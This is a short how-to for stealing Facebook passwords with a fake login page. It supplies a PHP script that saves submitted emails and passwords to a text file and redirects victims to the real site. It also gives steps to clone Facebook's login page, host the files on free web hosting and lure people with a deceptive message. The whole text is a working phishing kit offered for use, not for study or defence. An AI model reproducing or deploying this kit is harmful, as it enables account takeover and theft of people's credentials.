1. Open a notepad and copy the following script. Save it as phishing.php.
<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["pass"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle); header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html>
2. Open the Facebook login page then, Right click > View page source and paste it in notepad and save it as index.html.
3. Open that index.html file with a Notepad and search (By pressing Ctrl+F) for action in it and replace the following web address with phishing.php.
4. Now create a completely blank text file with name password.txt. Now you have all the following three files with you: phishing.php, index.html and password.txt. If you don't have your own web hosting account, go to any free web-hosting site that supports php, and in file manager, upload all the three files. With the Domain Name you registered on the Web-hosting site ask anyone to login and then check your password.txt file. You will find the Username and Password of that person stored in it. Though this method of hacking looks quite long yet, once you have created the fake page then you don't need to have anyone login on your computer .Just send that URL to anyone saying 'Hey! Join my page on Facebook!' or whatever and after he logins you will have his/her password.
